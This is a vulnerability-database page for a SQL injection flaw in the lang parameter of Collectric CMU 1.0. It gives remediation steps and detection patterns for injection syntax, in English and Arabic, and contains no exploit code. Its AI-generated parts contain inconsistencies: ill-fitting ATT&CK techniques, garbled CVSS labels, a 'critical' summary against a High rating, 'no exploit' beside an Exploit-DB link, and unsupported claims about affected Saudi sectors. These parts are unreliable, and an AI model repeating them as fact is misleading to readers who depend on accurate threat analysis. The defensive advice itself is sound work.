Vulnerabilities ›

CVE-2018-25379

High

CWE-89 — Weakness Type

                    Published: May 25, 2026                      ·  Modified: Jun 1, 2026                      ·  Source: NVD                

CVSS v3

8.2

🔗 NVD Official

📄 Description (English)

Collectric CMU 1.0 contains a boolean-based blind SQL injection vulnerability in the lang parameter that allows unauthenticated attackers to manipulate database queries during authentication. Attackers can inject SQL code through the lang parameter in login requests to extract sensitive information from the database using time-based blind techniques.

🤖 AI Executive Summary

CVE-2018-25379 is a critical unauthenticated SQL injection vulnerability in Collectric CMU 1.0 affecting the authentication mechanism via the lang parameter. Attackers can exploit boolean-based and time-based blind SQL injection techniques to extract sensitive database information without authentication. With a CVSS score of 8.2 and no available patch, this vulnerability poses significant risk to organizations using this product, particularly those handling authentication systems.

📄 Description (Arabic)

🤖 AI Intelligence Analysis Analyzed: May 29, 2026 02:03

🇸🇦 Saudi Arabia Impact Assessment

This vulnerability primarily impacts Saudi organizations using Collectric CMU 1.0 for authentication and access control systems. Most at-risk sectors include: Government agencies (NCA, NCSC) using legacy authentication systems; Banking sector (SAMA-regulated institutions) if CMU is integrated with authentication infrastructure; Healthcare providers (MOH) managing patient data access; Telecommunications operators (STC, Mobily) for subscriber management systems; Energy sector (ARAMCO, SEC) for operational technology access control. The unauthenticated nature of the exploit makes it particularly dangerous as attackers can bypass authentication entirely to access sensitive databases.

🏢 Affected Saudi Sectors

Government Banking Healthcare Energy Telecommunications Critical Infrastructure

🎯 MITRE ATT&CK Techniques

T1190 - Exploit Public-Facing Application (unauthenticated exploitation) T1110 - Brute Force (credential extraction via SQL injection) T1557 - Man-in-the-Middle (potential authentication bypass) T1040 - Traffic Sniffing (database query interception) T1021 - Remote Services (authentication system compromise) T1078 - Valid Accounts (unauthorized account access via injection)

⚖️ Saudi Risk Score (AI)

8.7

/ 10.0

🔧 Remediation Steps (English)

Immediate Actions:

1. Identify all systems running Collectric CMU 1.0 and isolate them from production networks if possible

2. Implement Web Application Firewall (WAF) rules to block SQL injection patterns in the lang parameter

3. Monitor authentication logs for suspicious lang parameter values containing SQL syntax characters (', ", --, ;, /*)

Compensating Controls:

1. Implement input validation: whitelist only valid language codes (e.g., ar, en) and reject any lang parameter containing special characters

2. Apply parameterized queries/prepared statements if source code access is available

3. Enforce principle of least privilege on database accounts used by CMU

4. Enable database query logging and audit all authentication attempts

5. Implement rate limiting on login endpoints to slow brute-force and injection attempts

6. Deploy intrusion detection signatures for SQL injection patterns

Detection Rules:

1. Alert on lang parameter containing: single quotes, double quotes, SQL keywords (UNION, SELECT, WHERE, OR), comment syntax (--, /*)

2. Monitor for unusual database query patterns or time delays in authentication responses

3. Track failed authentication attempts with malformed lang parameters

4. Log all database errors related to authentication queries

Long-term:

1. Migrate away from Collectric CMU 1.0 to a supported, patched authentication solution

2. Conduct security code review if migration is delayed

3. Implement Web Application Firewall with SQL injection detection

🔧 خطوات المعالجة (العربية)

الإجراءات الفورية:

1. تحديد جميع الأنظمة التي تعمل بـ Collectric CMU 1.0 وعزلها عن شبكات الإنتاج إن أمكن

2. تطبيق قواعد جدار حماية تطبيقات الويب لحجب أنماط حقن SQL في معامل lang

3. مراقبة سجلات المصادقة للقيم المريبة في معامل lang التي تحتوي على أحرف بناء جملة SQL

الضوابط البديلة:

1. تطبيق التحقق من المدخلات: قائمة بيضاء فقط لرموز اللغات الصحيحة (ar، en) ورفض أي معامل lang يحتوي على أحرف خاصة

2. تطبيق الاستعلامات المعاملة/البيانات المحضرة إذا كان الوصول إلى الكود المصدري متاحاً

3. فرض مبدأ أقل امتياز على حسابات قاعدة البيانات المستخدمة من قبل CMU

4. تفعيل تسجيل استعلامات قاعدة البيانات وتدقيق جميع محاولات المصادقة

5. تطبيق تحديد معدل على نقاط نهاية تسجيل الدخول لإبطاء محاولات الحقن والقوة الغاشمة

6. نشر توقيعات كشف الاختراق لأنماط حقن SQL

قواعد الكشف:

1. تنبيه عند احتواء معامل lang على: علامات اقتباس مفردة أو مزدوجة، كلمات SQL الرئيسية (UNION، SELECT، WHERE، OR)، بناء جملة التعليقات

2. مراقبة أنماط استعلامات قاعدة البيانات غير العادية أو تأخيرات الوقت في استجابات المصادقة

3. تتبع محاولات المصادقة الفاشلة مع معاملات lang المشوهة

4. تسجيل جميع أخطاء قاعدة البيانات المتعلقة باستعلامات المصادقة

المدى الطويل:

1. الهجرة بعيداً عن Collectric CMU 1.0 إلى حل مصادقة مدعوم ومصحح

2. إجراء مراجعة أمان الكود إذا تأخرت الهجرة

3. تطبيق جدار حماية تطبيقات الويب مع كشف حقن SQL

📋 Regulatory Compliance Mapping

🟢 NCA ECC 2024

ECC 2024 A.5.1.1 - Access Control Policy (authentication bypass risk) ECC 2024 A.5.2.1 - User Registration and Access Management (unauthenticated access) ECC 2024 A.5.3.1 - Password Management (authentication mechanism compromise) ECC 2024 A.6.1.1 - Information Security Policies and Procedures (vulnerability management) ECC 2024 A.12.2.1 - Change Management (patching and updates)

🔵 SAMA CSF

SAMA CSF ID.AM-2 - Asset Management (identify CMU systems) SAMA CSF PR.AC-1 - Access Control (authentication compromise) SAMA CSF PR.DS-2 - Data Security (database access control) SAMA CSF DE.CM-1 - Detection and Analysis (monitoring for exploitation) SAMA CSF RC.RP-1 - Recovery Planning (incident response)

🟡 ISO 27001:2022

ISO 27001:2022 A.5.15 - Access Control (authentication mechanism) ISO 27001:2022 A.5.16 - Identification and Authentication (unauthenticated access) ISO 27001:2022 A.5.18 - Management of Privileged Access Rights (database access) ISO 27001:2022 A.8.1 - User Endpoint Devices (application security) ISO 27001:2022 A.8.22 - Information Security Incident Management (incident response)

🟣 PCI DSS v4.0.1

PCI DSS 2.1 - Default Security Parameters (authentication system hardening) PCI DSS 6.5.1 - Injection Flaws (SQL injection vulnerability) PCI DSS 8.1 - User Identification and Authentication (authentication bypass) PCI DSS 10.2 - Logging and Monitoring (audit trails for authentication)

🔗 References & Sources 3

🔗

http://ourenergy.se/

disclosure@vulncheck.com

🔗

https://www.exploit-db.com/exploits/45446

disclosure@vulncheck.com

🔗

https://www.vulncheck.com/advisories/collectric-cmu-sql-injection-via-lang-parameter

disclosure@vulncheck.com

📊 CVSS Score

8.2

/ 10.0 — High

📊 CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Attack VectorN — None / Network

Attack ComplexityL — Low / Local

Privileges RequiredN — None / Network

User InteractionN — None / Network

ScopeU — Unchanged

ConfidentialityH — High

IntegrityL — Low / Local

AvailabilityN — None / Network

📋 Quick Facts

Severity High

CVSS Score8.2

CWECWE-89

EPSS0.12%

Exploit No

Patch ✗ No

Published 2026-05-25

Source Feed nvd

🇸🇦 Saudi Risk Score

8.7

/ 10.0 — Saudi Risk

Priority: CRITICAL

🏷️ Tags

CWE-89

⚡ Actions

🔗 NVD Official Page ⚡ Exploit-DB Search 🐙 GitHub PoC Search 🎯 MITRE ATT&CK 📊 CVE Details

CVE-2018-25379

Introduce Yourself

Sign In Required